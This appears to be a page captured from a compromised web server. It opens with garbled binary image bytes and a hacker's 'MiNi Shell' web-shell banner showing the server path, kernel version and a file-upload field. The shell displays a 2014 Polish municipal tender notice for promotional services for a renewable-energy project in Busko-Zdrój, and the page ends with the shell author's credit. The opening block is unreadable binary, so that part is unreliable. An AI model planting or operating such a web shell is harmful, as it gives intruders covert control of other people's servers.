JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140203/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140203/37518-N-2014.html

<p class="kh_header"><b>Busko-Zdrój: Kontrakt nr 4 - Działania  promocyjne w ramach projektu pn. *Instalacja systemów energii odnawialnej na budynkach użyteczności publicznej oraz domach prywatnych w gminach powiatu buskiego i pińczowskiego *</b><br>
<b>Numer ogłoszenia: 37518 - 2014; data zamieszczenia: 03.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta i Gminy , ul. Adama Mickiewicza 10, 28-100 Busko-Zdrój, woj. świętokrzyskie, tel. 041 3705200, faks 041 3705290.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umig.busko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kontrakt nr 4 - Działania  promocyjne w ramach projektu pn. *Instalacja systemów energii odnawialnej na budynkach użyteczności publicznej oraz domach prywatnych w gminach powiatu buskiego i pińczowskiego *.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa dotycząca działań promocyjnych w ramach Projektu *Instalacja systemów energii odnawialnej na budynkach użyteczności publicznej oraz domach prywatnych w gminach powiatu buskiego i pińczowskiego*. 
Zakres przedmiotu zamówienia
W ramach realizacji przedmiotu umowy, o którym mowa w ust.1 Wykonawca jest zobowiązany do:
1. Dostarczenia materiałów informacyjnych, w tym:
a) ulotki informacyjne: format A4, papier kreda błyszcząca 150g, 2 strony nadruk 4+4 kolor, nakład jednorazowy 1 500 szt.
b) broszury informacyjne: format A5, papier kreda błyszcząca 170g, 8 stron nadruk 4+4 kolor, szycie na 2 zszywki, nakład jednorazowy 1 500 szt.
Wykonanie materiałów informacyjnych w terminie 1 miesiąca od zatwierdzenia treści i opracowania graficznego przez Zamawiającego.
Projekt ulotek i broszur winien zostać przedłożony Zamawiającemu do akceptacji najpóźniej 45 dni przed planowanym terminem ich dostawy. 
Wykonanie materiałów informacyjnych winno nastąpić w terminie 1 miesiąca od zatwierdzenia treści i opracowania graficznego przez Zamawiającego.
Uwaga: Materiały informacyjne zostaną przekazane przez Wykonawcę Instytucji Realizującej, tj. Gminie Busko - Zdrój. Odbiór materiałów winien być potwierdzony na piśmie przez podpisanie stosownego Protokołu Odbioru Dostaw. 
Instytucja Realizująca  przekaże materiały w stosownych ilościach Zamawiającemu. 
2. Organizacji i przeprowadzenia konferencji podsumowującej Projekt. 
Konferencja może zostać zorganizowana w Buskim Samorządowym Centrum Kultury (BSCK) w Busku - Zdroju lub w innym miejscu ustalonym z Zamawiającym na terenie miasta Busko - Zdrój. Koszty wynajmu sali obciążają Wykonawcę. 
Konferencja winna zostać zorganizowana dla 200 uczestników. 
Przygotowanie Konferencji podsumowującej obejmuje:
a) Opracowanie i wydruk 100 zaproszeń: papier kredowy błyszczący 300g, format 100x210mm, nadruk 4+4 kolor wraz z kopertą.
Projekt zaproszenia winien zostać przedłożony Zamawiającemu 30 dni przed planowanym terminem konferencji. Gotowe zaproszenia winny zostać przekazane Zamawiającemu w terminie 21 dni przed planowanym terminem konferencji.
Kolportaż zaproszeń do właściwych osób/uczestników konferencji leży po stronie Zamawiającego.
b) Wykonanie i dostarczenie teczek reklamowych (sztancowane wg wykrojnika, papier karton jednostronnie powlekany 250g, nadruk 4+4 kolor, nakład - 200 szt.)
Projekt teczek reklamowych winien zostać przedłożony do akceptacji Zamawiającego 30 dni przed planowanym terminem konferencji. Gotowe materiały winny być przekazane Zamawiającemu w terminie minimum 7 dni przed  planowanym terminem konferencji.
c) Wykonanie i dostarczenie notatników: format A4, 24 karty, papier offset 80g, nadruk 4+4 kolor, klejone po krótkim boku, nakład - 200 szt.
Projekt notatników winien zostać przedłożony do akceptacji Zamawiającego 30 dni przed planowanym terminem konferencji. Gotowe materiały winny być przekazane Zamawiającemu w terminie minimum 7 dni przez planowanym terminem konferencji.
d) Wykonanie oznakowanie i dostarczenie długopisów automatycznych z korpusem metalowym i nadrukiem promującym Projekt w ilości 200 szt.
Kolor obudowy miks kolorystyczny (czerwony, złoty, niebieski) - z niebieskim wkładem wymiennym, znakowanie jednostronne, technika: grawer laserowy,
Propozycja długopisów wraz z oznakowaniem winna zostać przedłożona do akceptacji Zamawiającego 30 dni przed planowanym terminem konferencji. Gotowe długopisy winny być przekazane Zamawiającemu w terminie 7 dni przed planowanym terminem konferencji.
e) Przygotowanie prezentacji multimedialnej dotyczącej Projektu, obejmującej 25 slajdów, opracowanej w programie PowerPoint.
Prezentacja winna być przekazana Zamawiającemu min. 30 dni przed planowanym terminem konferencji.
f) Przygotowanie i kolportowanie w czasie konferencji informacji dla mediów.
g) Zapewnienie cateringu w postaci bufetu kawowego dla 200 osób w holu BSCK lub innym miejscu ustalonym wcześniej z Zamawiającym obejmującego:
- kawę rozpuszczalną w termosach (podawaną w filiżankach o pojemności nie mniejszej niż 200ml; - bez ograniczeń
- herbatę ekspresową czarną podawaną w filiżankach o pojemności nie mniejszej niż 200 ml; wrzątek 
w termosach - bez ograniczeń
- dodatki do herbaty i kawy: cytryna w plasterkach (podawana na talerzykach), śmietanka do kawy UHT (10g), cukier biały w cukiernicach.
- soki owocowe (4 rodzaje) - w ilości 50 kartonów 1 litrowych, 
- wodę mineralną gazowaną i niegazowaną [z uwzględnieniem regionalnej wody mineralnej] - w ilości: 100 butelek 0,33 l wody gazowanej oraz 100 butelek 0.33 l wody niegazowanej, 
- 5 rodzajów ciastek (w tym 2 rodzaje ciastek oblewanych czekoladą) w ilości - po 1 szt./osobę 
z każdego rodzaju, 
- owoce (banany, jabłka, mandarynki, winogrona jasne i ciemne) - 70g/os
h) Zapewnienie cateringu w postaci obiadu dla 200 osób podanego w Auli BSCK lub innym miejscu ustalonym wcześniej z Zamawiającym obejmującego: 
- zupę gulaszową łagodną o gramaturze nie mniejszej niż 400g z zawartością mięsa nie mniejszej niż 200g., 
- 2 danie: kotlet schabowy - 150g/os,   ziemniaki puree - 200g/os ,   zestaw surówek - 150g/os
- deser: ciastko typu WZ - 120g/os
- sok, w ilości 1 szkl./osobę.
Obiad dla każdego uczestnika powinien być ciepły, wysokiej jakości zarówno co do wartości odżywczej jak i gramatury.
Wykonawca zapewnia własne naczynia (termosy, filiżanki, spodeczki, szklanki, sztućce, cukierniczki, talerze, itp.) zgodnie z wymaganiami menu. Nie dopuszcza się możliwości użycia naczyń i sztućców plastikowych. 
Wymaga się, by transport produktów, które tego wymagają, był przeprowadzony w urządzeniach chłodniczych. 
Wykonawca winien wykonać usługę w zakresie cateringu zgodnie z obowiązującymi przepisami dotyczącymi zbiorowego żywienia.
Usługa cateringowa winna być wykonana w sposób profesjonalny oraz nie zakłócający przebiegu konferencji.
i) Wykonanie dokumentacji fotograficznej z konferencji i dostarczenie jej Zamawiającemu w formie elektronicznej (na płycie CD) w formacie JPEG wysokiej rozdzielczości oraz RAW. 
Dokumentacja fotograficzna powinna zawierać 30 zdjęć, uwzględniających cały przebieg konferencji. Dokumentacja fotograficzna powinna zostać przekazana Zamawiającemu w terminie 7 dni od daty konferencji.
Instytucja Realizująca działająca w imieniu Zamawiającego przekaże Wykonawcy treści jakie powinny się znaleźć na zleconych do wykonania materiałach informacyjno - promocyjnych w siedzibie Zamawiającego 
w terminie min. 30 dni przed upływem terminu zgodnie z p VII  ust. 1 ppkt 1a i 1b. Informacje te obejmują, między innymi: informację o Projekcie współfinansowanym w ramach Szwajcarsko - Polskiego Programu Współpracy, informację o Gminach Partnerskich oraz inne niezbędne informacje właściwe dla wykonywanego materiału informacyjno - promocyjnego.
Szczegółowy termin i plan konferencji, zawartość prezentacji i materiałów dla mediów oraz catering zostaną szczegółowo ustalone z Instytucją Realizującą działająca w imieniu Zamawiającego z min 60 dniowym wyprzedzeniem przed upływem terminu zgodnie z p. VII ust.1 ppkt 2. 
Wykonawca podczas wykonywanej usługi winien zapewnić: przygotowanie bufetów (stołów itp.) wraz z dekoracją, obsługę kelnerską, usługę bieżącego uzupełniania poczęstunku oraz usuwania brudnych naczyń, pozostawania do dyspozycji Zamawiającego i uczestników, zapewnienia sprzętu niezbędnego do wydawania posiłków, zapewnienia zastawy stołowej do menu w niezbędnych ilościach, zapewnienia obrusów, serwetek jednorazowych, transportu i serwisu sprzątającego w trakcie trwania imprezy oraz po jej zakończeniu. 
Wykonawca winien sprawować nadzór nad prawidłowością przebiegu konferencji.
3. Wszystkie wzory dokumentów, o których mowa w niniejszym punkcie III. 3 . Wykonawca winien przedłożyć do akceptacji wszystkich Gminom Partnerskim. Ostateczne wzory przedmiotowych dokumentów powinny uzyskać akceptację na piśmie sygnowaną przez Instytucję Realizującą w imieniu wszystkich Gmin Partnerskich.

4. Po zrealizowaniu przedmiotu Umowy Wykonawca dokona do Zamawiającego pisemnego Zgłoszenia Zakończenia Usługi.

Zadanie stanowiące przedmiot zamówienia będzie współfinansowane ze środków Szwajcarsko-Polskiego Programu Współpracy. Zadanie *Kontrakt nr 4 - *Działania promocyjne w ramach projektu*  jest zamówieniem realizowanym w ramach Projektu *Instalacja systemów energii odnawialnej na budynkach użyteczności publicznej i domach prywatnych w gminach powiatu buskiego i pińczowskiego* o szacowanej wartości nieprzekraczającej kwotę 207 000 EURO..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.34.00.00-9, 79.34.22.00-5, 79.41.60.00-3, 39.29.41.00-0, 22.46.20.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest wnieść wadium w wysokości 1 000,00 zł  (słownie: jeden tysiąc złotych 00/100). Wykonawca, który nie wniósł wadium, zostaje wykluczony z postępowania, a jego ofertę uznaje się za odrzuconą</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje minimalnych wymagań na spełnienie powyższego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeśli Wykonawca wykaże:  wykonanie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 głównych zamówień polegających na działaniach informacyjno-promocyjnych z których każde obejmowało swoim zakresem co najmniej :
- emisję materiałów promocyjnych tj.: ulotki informacyjne lub broszury informacyjne o łącznej ilości co najmniej 1000 szt.
- organizację i przeprowadzenie  konferencji informacyjnej  dla co najmniej 60 uczestników, w tym  jednego zamówienia dotyczącego działań informacyjnych z zakresu energetyki lub ochrony środowiska
z podaniem wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane oraz załączeniem dowodów że usługi te zostały wykonane w sposób należyty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponować podczas realizacji zamówienia co najmniej  jedną osobą, która będzie kierować działaniami ze strony Wykonawcy, posiadającą doświadczenie zawodowe  polegające na kierowaniu co najmniej dwoma kampaniami informacyjnymi o tematyce energetycznej lub ochrony środowiska, w tym zorganizowanie co najmniej jednej konferencji informacyjnej dla co najmniej 60 uczestników. 
Uwaga! Osoba ta powinna biegle posługiwać się językiem polskim (w mowie i piśmie).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje minimalnych wymagań na spełnienie powyższego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje następujące okoliczności i warunki zmiany postanowień zawartej umowy:
1. Zmiana postanowień umowy wymaga formy pisemnej pod rygorem nieważności.
2. Zmiana postanowień umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, może nastąpić w przypadku: 
wystąpienia nieistotnych zmian tj. zmian, które nie mają wpływu na tzw. konieczne warunki Umowy (termin, zakres, wartość Umowy).
3. Zmiana terminu wykonania przedmiotu umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, może nastąpić w przypadkach, gdy: 
1) Z przyczyn innych niż zawinione przez Wykonawcę, pod warunkiem, że Wykonawca po stwierdzeniu, że zaistniała okoliczność, która daje podstawę do oceny, że zamówienie nie może zostać zrealizowane w umówionym terminie, niezwłocznie pisemnie powiadomi Zamawiającego o takim niebezpieczeństwie, wskazując jego przyczynę i prawdopodobny czas opóźnienia a Zamawiający wyrazi zgodę na te zmiany,
2) Na wniosek Zamawiającego, terminów określonych w części VII ppk. 1.1) i 1.2) z uwagi na zmiany terminów realizacji projektu, dla którego mają być prowadzone działania promocyjne objęte niniejszym SIWZ, 
3) Działania siły wyższej, w tym wojny, pożaru, klęski żywiołowej, rozruchów, strajku uniemożliwiającej realizację części lub całości zamówienia. Termin ten zostaje wówczas przedłużony o czas trwania zaistniałych okoliczności - do czasu ustąpienia tych okoliczności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.umig.busko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Busku-Zdroju, ul. Mickiewicza 10, pok. Nr 37.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.02.2014 godzina 11:00, miejsce: Urząd Miasta i Gminy w Busku-Zdroju, ul. Mickiewicza 10, pok. Nr 3 (Biuro Obsługi Interesanta).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com